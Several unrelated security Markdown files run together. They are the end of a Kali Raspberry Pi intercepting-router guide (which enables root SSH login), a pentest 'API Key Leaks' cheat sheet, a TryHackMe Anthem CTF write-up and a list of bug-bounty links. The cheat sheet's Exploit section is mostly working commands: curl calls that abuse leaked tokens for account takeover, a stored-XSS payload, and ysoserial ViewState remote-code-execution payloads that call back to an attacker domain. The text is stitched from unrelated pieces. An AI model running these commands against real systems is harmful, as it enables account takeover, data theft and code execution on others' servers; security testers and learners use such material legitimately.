$ sudo diskutil unmount /dev/disk2
```
On Ubuntu, we unmount it with the ```umount``` command.
```shell
$ sudo umount /dev/sdb
```
We copy Kali to the SD card with the ```dd``` command. Replace ```rdisk2``` with the correct disk (i.e. ```/dev/sdb``` in my Kali machine) and replace ```LocationOfKaliImage``` with the path to your Kali Linux machine.
```shell
$ sudo dd bs=1m if=LocationOfKaliImage of=/dev/rdisk2
```
We expand Kali to take the complete SD card with the ```gparted``` application running on our Ubuntu machine.
```shell
$ apt-get install gparted
$ gparted
```
We select the SD card (typically ```/dev/sdb```). Observe that there is empty space after the data partition. We right click on the one that contains data (light yellow, typically ```/dev/sdb2```) and click ```Resize/Move```.
![Select the SD card and click resize.](pics/resizepartition.png)
In the resize dialog box, we change the ```Free Space Following``` to zero, and click ```Resize```. In our case, we expand our kali partition to about 30GB.
![Select the SD card and click resize.](pics/resizepartition2.png)
We right click on the pending operation (at the bottom of gparted), select ```Apply All Operations```.
![Select the SD card and click resize.](pics/resizepartition3.png)
After completion, we eject the SD card and insert it into the Raspberry Pi, connect the Pi to a screen, attach a keyboard and mouse, and connect it to our network with an Ethernet cable. We plug in the power source to boot into Kali Linux for the first time and we login with the username "```root```" and the password ```"toor"```.
We update the software of the device by running the following commands:
```shell
$ apt-get update
$ apt-get upgrade
$ apt-get dist-upgrade
```
We update the root password by executing ```passwd```.
```shell
$ passwd root
```
To communicate with our Raspberry Pi from our computer, we will use SSH. As it is not installed, we will install and enable it on boot as follows:
```shell
$ apt-get install openssh-server
$ update-rc.d -f ssh remove
$ update-rc.d -f ssh defaults
```
We change the default keys as follows:
```shell
$ cd /etc/ssh/
$ mkdir insecure_old
$ mv ssh_host* insecure_old
$ dpkg-reconfigure openssh-server
```
We change the ```sshd_config``` file to allow our root user to authenticate. (Note, this is not secure; it is better to create a regular user).
```shell
$ nano /etc/ssh/sshd_config
```
We change the following line.
```shell
PermitRootLogin without-password
```
to this line instead:
```shell
PermitRootLogin yes
```
We save our changes and restart the openssh-server.
```shell
$ service ssh restart
$ update-rc.d -f ssh enable 2 3 4 5
```
We want to install ```net-tools``` so that we are able to use ```ifconfig```.
```shell
$ apt-get install net-tools
```
We then check out our scripts on the raspberry Pi, connect our USB adapters, follow the instructions in the [Automation](#automation) section (use ```wlan1``` instead of ```wlan0```), and are ready to go.
```shell
$ git clone https://github.com/koenbuyens/kalirouter.git
```
## Conclusion
We transformed Kali into an intercepting router so that we can easily intercept communication between multiple devices.
## References
The following links helped me creating a wired/wireless router in Kali Linux.
- [https://www.psattack.com/articles/20160410/setting-up-a-wireless-access-point-in-kali/](https://www.psattack.com/articles/20160410/setting-up-a-wireless-access-point-in-kali/)
- [https://cybergibbons.com/security-2/quick-and-easy-fake-wifi-access-point-in-kali/](https://cybergibbons.com/security-2/quick-and-easy-fake-wifi-access-point-in-kali/)
- [https://ubuntuforums.org/showthread.php?t=716192](https://ubuntuforums.org/showthread.php?t=716192)
- [https://help.ubuntu.com/community/NetworkConnectionBridge](https://help.ubuntu.com/community/NetworkConnectionBridge)
- [https://wiki.archlinux.org/index.php/Internet_sharing#Configuration](https://wiki.archlinux.org/index.php/Internet_sharing#Configuration)
- [https://wiki.archlinux.org/index.php/software_access_point#Bridge_setup](https://wiki.archlinux.org/index.php/software_access_point#Bridge_setup)
- [https://wiki.debian.org/BridgeNetworkConnections#Manual_bridge_setup](https://wiki.debian.org/BridgeNetworkConnections#Manual_bridge_setup)
- [https://help.ubuntu.com/lts/serverguide/network-configuration.html](https://help.ubuntu.com/lts/serverguide/network-configuration.html)
- [http://www.tldp.org/HOWTO/TransparentProxy-6.html](http://www.tldp.org/HOWTO/TransparentProxy-6.html)
|
# API Key Leaks
> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
## Summary
- [Tools](#tools)
- [Exploit](#exploit)
- [Google Maps](#google-maps)
- [Algolia](#algolia)
- [Slack API Token](#slack-api-token)
- [Facebook Access Token](#facebook-access-token)
- [Github client id and client secret](#github-client-id-and-client-secret)
- [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
- [Twitter API Secret](#twitter-api-secret)
- [Twitter Bearer Token](#twitter-bearer-token)
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
- [HockeyApp API Token](#hockeyapp-api-token)
- [IIS Machine Keys](#iis-machine-keys)
- [Mapbox API Token](#Mapbox-API-Token)
## Tools
- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web
- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
```ps1
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
trufflehog git https://github.com/trufflesecurity/trufflehog.git
trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
```
- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
```powershell
nuclei -t token-spray/ -var token=token_list.txt
```
- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
```ps1
python examples/cli.py --url http://example.com/contains_bad_secret.html
python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
```
- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
## Exploit
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
### Google Maps
Use : https://github.com/ozguralp/gmapsapiscanner/
Usage:
| Name | Endpoint |
| --- | --- |
| Static Maps | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE |
| Streetview | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
| Embed | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE |
| Directions | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE |
| Geocoding | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE |
| Distance Matrix | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
| Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
| Autocomplete | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE |
| Elevation | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE |
| Timezone | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key=KEY_HERE |
| Roads | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE |
| Geolocate | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE |
Impact:
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
### Algolia
```powershell
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
```
### Slack API Token
```powershell
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
```
### Facebook Access Token
```powershell
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
```
### Github client id and client secret
```powershell
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
```
### Twilio Account_sid and Auth token
```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
```
### Twitter API Secret
```powershell
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
```
### Twitter Bearer Token
```powershell
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
```
### Gitlab Personal Access Token
```powershell
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
```
### HockeyApp API Token
```powershell
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
```
### IIS Machine Keys
> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Requirements
* machineKey **validationKey** and **decryptionKey**
* __VIEWSTATEGENERATOR cookies
* __VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
```xml
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
```
Common locations of **web.config** / **machine.config**
* 32-bit
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
* 64-bit
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
* in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
* HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
* HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
#### Identify known machine key
* Exploit with [Blacklist3r/AspDotNetWrapper](https://github.com/NotSoSecure/Blacklist3r)
* Exploit with [ViewGen](https://github.com/0xacb/viewgen)
```powershell
# --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file
# -m MODIFIER, --modifier MODIFIER: VIEWSTATEGENERATOR value
$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
[+] ViewState is not encrypted
[+] Signature algorithm: SHA1
# --encrypteddata : __VIEWSTATE parameter value of the target application
# --modifier : __VIEWSTATEGENERATOR parameter value
$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
```
#### Decode ViewState
```powershell
$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
```
#### Generate ViewState for RCE
**NOTE**: Send a POST request with the generated ViewState to the same endpoint, in Burp you should **URL Encode Key Characters** for your payload.
```powershell
$ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
$ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
```
#### Edit cookies with the machine key
If you have the machineKey but the viewstate is disabled.
ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
```powershell
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
```
### Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
```
#Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
```
## References
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
* [Mapbox API Token Documentation](https://docs.mapbox.com/help/troubleshooting/how-to-use-mapbox-securely/)
|
# Anthem CTF [TryHackMe](https://tryhackme.com/room/anthem)
---
![Room Logo](./.assets/logo.gif)
---
## Index
- [Enumeration](#enumeration)
- [Flag Hunting](#finding-those-flags)
- [Machine Access](#gaining-access-to-the-machine)
- [PrivEsc](#priviledge-escalation)
- [Final Thoughts](#final-thoughts)
---
```bash
$ export IP=10.10.109.175
```
---
### Enumeration
```bash
$ nmap -sC -sV -v $IP -oN nmap/initial.nmap
$ nmap -p- -T4 -v $IP -oN nmap/all_ports.nmap
$ gobuster dir -t 64 -u $IP -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .php,.txt,.html,.jpg,.png -o gobuster/dir_med_init.txt
```
Ports:
```
80 http
3389 rdp
```
Interesting directories:
```
/robots.txt
/Authors
```
Going into `robots.txt` we notice some interesting and juicy information.
A potential password: `****************!`
CMS (control management system): `umbraco`
We can also log into the umbraco center if needed now!
Manually exploring the website now, we notice some interesting facts. They have a domain name `Anthem.com` (you don't have to add this to your `hosts` file thankfully)
Trying to find the Administrator's name proved surprising tricky. I tried various googling methods (simultaneously avoiding other write-ups on my journey) but I finally found something that seemed valid.
When you google
```
Born on a Monday, Christened on Tuesday...
```
It shows that it is a reference to a DC character `Solomon Grundy`'s poem about his life.
He was
```poem
Born on a Monday,
Christened on Tuesday,
Married on Wednesday,
Took ill on Thursday,
Grew worse on Friday,
Died on Saturday,
Buried on Sunday.
That was the end…
```
As a DC fan, I loved this cheeky reference but I had to turn my attention _back_ to the machine now.
We had a name now and I had noticed earlier that another user `Jane Doe`'s email was `[email protected]` which probably means that `Solomon Grundy`'s email was `[email protected]`. Which it was!
---
### Finding those flags
To preface this, I didn't know about website crawlers until _after_ I had completed this room and checked other write-ups about how they had fared.
The way **_novice I_** went about was opening inspector, clicking every half-interesting link and searching for THM.
I knew I was looking for THM flags because I accidently found one earlier under the `Authors` directory when enumerating the website.
Flag 1 - Check your posts: `THM{***_***_****_****}`
Flag 2 - Just search THM: `THM{***_***}`
Flag 3 - Check who wrote it: `THM{***_***_***}`
Flag 4 - Check flag 1: `THM{*******_****}`
---
### Gaining access to the machine
This section really highlighted to me how accustomed I had become to Linux and how much I _despise_ using Windows, not to mention the sluggishness of the machine.
Using the credentials we got earlier, `[email protected]` and the password from `robots.txt` we can now log into the machine with RDP. Since I am on MacOS I used Microsoft's [app](https://apps.apple.com/us/app/microsoft-remote-desktop/id1295203466?mt=12) on the App Store.
---
### Priviledge Escalation
Now that we have logged in, we can see the user flag on the desktop `THM{****_****}` and we can start looking for ways to escalate our priviledges
I opened up powershell since that had similarity to Bash that I felt somewhat comfortable ( :/ ) with.
I decided that since this is an easy box, there is probably some hidden folder and I was not in the mood to figure out how to get winpeas working.
Thankfully, starting from the root directory and using `ls -Force` reveals a hidden `backup` folder. Navigating into it and trying to view the file though indicated I didn't have permissions.
But I also knew I was something of an admin so I could probably force it to? Googling for answers I realised I could add the `Users` group to view the file (I really don't like Windows) and I now had a password `*********************` for the Administrator. I think?
But then, after a bit of googling I found that it was as easy as logging in with the username `Administrator`...
`su Administrator` didn't work... :/
Now that I had logged out of Solomon's account and into the "Administrator" account, I had the root flag on the desktop `THM{***_***_****}`! Thank god
---
### Final thoughts
Overall I enjoyed this machine and despite my Window's whining, it did make me realise that I really do have to dote more attention to properly learning Windows and its ins and outs.
And a huge plus side is that this was a lot more enjoyable (and less buggy) than the actual Anthem game ;)
Strongly recommened for beginers like myself
---
![Solomon Grundy](./.assets/solomon_grundy.png)
|
## 23.07.2023
https://blog.doyensec.com/2023/07/18/streamlining-websocket-pentesting-with-wsrepl.html
## Github
[Awesome CTF Cheatsheet](https://github.com/uppusaikiran/awesome-ctf-cheatsheet)
[Bug Bounty](https://github.com/m0chan/BugBounty)
## Blog-Posts & Write-ups
[CVE-2020-13379-Write-Up/Unauthenticated SSRF on Grafana](https://rhynorater.github.io/CVE-2020-13379-Write-Up)
[How I exploit the JSON CSRF with method override technique](https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0)
[Multiple Ways to Exploiting PUT Method](https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/)
[Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f)
[WRITE UP – GOOGLE BUG BOUNTY: XSS TO CLOUD SHELL INSTANCE TAKEOVER (RCE AS ROOT) – $5,000 USD](https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/)
[CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails](https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/)
[The Powerful HTTP Request Smuggling 💪](https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142)
[Forcing Firefox to Execute XSS Payloads during 302 Redirects](https://www.gremwell.com/firefox-xss-302)
[Active Content Injection with SVG Files](https://owasp.org/www-pdf-archive/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf)
[Open redirect to a complete account takeover](https://ninetyn1ne.github.io/2020-10-05-open-redir-to-ato/)
[Finding Hidden Files and Folders on IIS using BigQuery](https://blog.assetnote.io/2020/09/18/finding-hidden-files-folders-iis-bigquery/)
[We Hacked Apple for 3 Months: Here’s What We Found](https://samcurry.net/hacking-apple/)
[NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d)
[Exploring SSTI In Flask/Jinja2](https://blog.nvisium.com/p263)
[Exploring SSTI In Flask/Jinja2 Part II](https://blog.nvisium.com/p255)
[SSTI With Jinja2](https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/)
[Taking down the SSO, Account Takeover in the Websites of Kolesa due to Insecure JSONP Call](https://medium.com/bugbountywriteup/taking-down-the-sso-account-takeover-in-3-websites-of-kolesa-due-to-insecure-jsonp-call-facd79732e45)
[BugPoc LFI challenge Walkthrough](https://medium.com/@youssefla/bugpoc-lfi-challenge-walkthrough-a442a7a74729)
[S2–016 (Apache Struts) Remote Code Execution Vulnerability](https://medium.com/@neeraj.iiita2009/s2-016-apache-struts-remote-code-execution-vulnerability-7206f1467b23)
[HTTP Host header attacks](https://portswigger.net/web-security/host-header)
[File Upload XSS](https://brutelogic.com.br/blog/file-upload-xss/)
[Finding 0day to hack Apple](https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md)
[A Glossary of Blind SSRF Chains](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
[Your Full Map To Github Recon And Leaks Exposure](https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82)
[Pentesting PostgreSQL with SQL Injections](https://www.onsecurity.io/blog/pentesting-postgresql-with-sql-injections/)
[Hidden OAuth attack vectors](https://portswigger.net/research/hidden-oauth-attack-vectors)
[Breaking GitHub Private Pages for $35k](https://robertchen.cc/blog/2021/04/03/github-pages-xss)
[Discovering GraphQL endpoints and SQLi vulnerabilities](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
[GravCMS Unauthenticated Arbitrary YAML Write/Update leads to Code Execution (CVE-2021-21425)](https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/)
[GHSL-2021-050: Unauthenticated abritrary file read in Jellyfin - CVE-2021-21402](https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/)
[http2smugl: HTTP2 request smuggling security testing tool](https://lab.wallarm.com/http2smugl-http2-request-smuggling-security-testing-tool/)
[I Built a TV That Plays All of Your Private YouTube Videos](https://bugs.xdavidhu.me/google/2021/04/05/i-built-a-tv-that-plays-all-of-your-private-youtube-videos/)
[Facebook account takeover due to a bypass of allowed callback URLs in the OAuth flow](https://ysamm.com/?p=646)
[Facebook account takeover due to a wide platform bug in ajaxpipe responses](https://ysamm.com/?p=654)
[Regexploit: DoS-able Regular Expressions](https://blog.doyensec.com/2021/03/11/regexploit.html)
[Jackson Polymorphic Deserialization](https://medium.com/@david.truong510/jackson-polymorphic-deserialization-91426e39b96a)
[DNS Based Out of Band Blind SQL injection in Oracle — Dumping data](https://usamaazad.medium.com/dns-based-out-of-band-blind-sql-injection-in-oracle-dumping-data-45f506296945)
[Out-of-Band (OOB) SQL Injection](https://infosecwriteups.com/out-of-band-oob-sql-injection-87b7c666548b)
[ExifTool CVE-2021-22204 - Arbitrary Code Execution](https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)
[A tale of solving all the recent XSS challenges using chrome 1-day](https://blog.s1r1us.ninja/CTF/site-isolation)
[Just Gopher It: Escalating a Blind SSRF to RCE for $15k](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
[Angular And AngularJS For Pentesters - Part 1](https://blog.nvisium.com/angular-for-pentesters-part-1)
[Angular And AngularJS For Pentesters - Part 2](https://blog.nvisium.com/angular-for-pentesters-part-2)
[Web App Pen Testing in an Angular Context](https://www.blackhillsinfosec.com/web-app-pen-testing-in-an-angular-context/)
[Intro to the Content Security Policy (CSP)](https://blog.shiftleft.io/intro-to-the-content-security-policy-csp-c29266fa095f)
[How to Read an RFC](https://www.mnot.net/blog/2018/07/31/read_rfc)
[XSS - localStorage vs Cookies](https://academind.com/tutorials/localstorage-vs-cookies-xss/ )
[Burp Suite Extensions: Rarely Utilized but Quite Useful](https://medium.com/mii-cybersec/burp-suite-extensions-rarely-utilized-but-quite-useful-8d57c5a3a06b)
[Burp Suite extensions that should get your attention!](https://blog.yeswehack.com/yeswerhackers/pimpmyburp/pimpmyburp-4-burp-suite-extensions-should-get-your-attention/)
[SSRF in PDF Renderer using SVG](https://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg)
[From Git Folder Disclosure to Remote Code Execution](https://pwn.vg/articles/2020-12/from-git-disclosure-to-remote-code-execution)
[XSS via postMessage in chat.mozilla.org](https://keerok.github.io/2021/05/20/mozilla-xss/)
[Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f)
[SSTI/Exploiting Go's template engine to get xss](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
[Method Confusion In Go SSTIs Lead To File Read And RCE.](https://www.onsecurity.io/blog/go-ssti-method-research/)
[Finding and Exploiting Unintended Functionality in Main Web App APIs](https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af)
[Server Side Template Injection – on the example of Pebble](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
[Handlebars template injection and RCE in a Shopify app](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
[Hacking the Hackers: Leveraging an SSRF in HackerTarget](https://www.corben.io/hackertarget/)
[Unauthenticated Gitlab SSRF](https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html)
[Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
## Hackerone Reports
[Insufficient validation on Digits bridge](https://hackerone.com/reports/168116)
[Buffer overflow In hl.exe's](https://hackerone.com/reports/832750)
[Arbitrary code execution in desktop client via OpenSSL config](https://hackerone.com/reports/622170)
[Cross-account stored XSS at embedded charts](https://hackerone.com/reports/709883)
[DOM XSS on duckduckgo.com search](https://hackerone.com/reports/921635)
[Ability to generate shipping labels in another store orders](https://hackerone.com/reports/884159)
[Full Read SSRF on Gitlab's Internal Grafana](https://hackerone.com/reports/878779)
[Private list members disclosure via GraphQL](https://hackerone.com/reports/885539)
[Stealing Zomato X-Access-Token: in Bulk using HTTP Request Smuggling on api.zomato.com](https://hackerone.com/reports/771666)
[Email Confirmation Bypass in your-store.myshopify.com which leads to privilege escalation](https://hackerone.com/reports/910300)
[Open Redirect Leads to Account Takeover](https://hackerone.com/reports/905607)
[Takeover an account that doesn't have a Shopify ID and more](https://hackerone.com/reports/867513)
[Email Confirmation Bypass in myshop.myshopify.com that Leads to Full Privilege Escalation to Any Shop Owner by Taking Advantage of the Shopify SSO](https://hackerone.com/reports/791775)
[HackerOne Jira integration plugin Leaked JWT to unauthorized jira users](https://hackerone.com/reports/1103582)
[Authorization Token on PlayStation Network Leaks via postMessage function](https://hackerone.com/reports/826394)
[Access Token Smuggling from my.playstation.com via Referer Header](https://hackerone.com/reports/835437)
[SSRF vulnerablity in app webhooks](https://hackerone.com/reports/56828)
[Blind SSRF in Ticketing Integrations Jira webhooks leading to internal network enumeration and blind HTTP requests](https://hackerone.com/reports/344032)
[Remote Code Execution in Slack desktop apps](https://hackerone.com/reports/783877)
[RCE when removing metadata with ExifTool - CVE-2021-22204](https://hackerone.com/reports/1154542)
[SSRF на https://qiwi.com с помощью "Prerender HAR Capturer"](https://hackerone.com/reports/1153862)
## Tools
https://github.com/ReFirmLabs/binwalk
https://github.com/zaproxy/zaproxy
https://github.com/xmendez/wfuzz
https://github.com/thewhiteh4t/FinalRecon
https://github.com/sensepost/gowitness
https://github.com/aquasecurity/kube-hunter
https://github.com/zigoo0/JSONBee
https://github.com/httpie/httpie
https://github.com/lobuhi/byp4xx
https://github.com/filedescriptor/untrusted-types
https://github.com/internetwache/GitTools
https://github.com/sbp/gin
